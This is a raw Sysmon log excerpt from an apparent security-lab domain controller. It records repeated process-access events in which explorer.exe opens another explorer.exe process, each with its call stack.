22:54:54.169{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.168{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.167{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.166{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 